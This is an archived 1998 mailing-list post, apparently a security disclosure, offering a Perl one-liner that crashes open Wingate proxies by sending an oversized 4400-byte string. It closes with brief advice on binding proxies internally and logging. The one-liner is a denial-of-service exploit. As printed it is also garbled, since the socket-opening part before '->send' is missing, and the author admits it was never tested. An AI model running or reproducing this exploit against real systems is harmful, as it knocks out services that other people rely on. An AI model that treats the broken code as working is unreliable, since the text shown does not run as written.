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crashing wingates

daemon@ATHENA.MIT.EDU (G23)
Sat Nov 14 16:50:39 1998

Date: 	Sat, 14 Nov 1998 13:51:30 -0500
Reply-To: G23 <g23@USA.NET>
From: G23 <g23@USA.NET>


The following one-liner will crash an open Wingate.

perl -MIO::Socket -e \
->send("X" x 4400 . "\n",0)'

Unfortunately I don't have access to one that I can test, so I am unable to verify what versions are vulnerable.  The above is my rendition of a 44 line sh script written by "rEWTED" (kefka@infected.org).

Anyone configuring a proxy for LAN use should only bind to an internal
interface anyway.  (IE, kidz shouldn't even see your proxy)

If you do provide telnet proxy for the world, then at least log.


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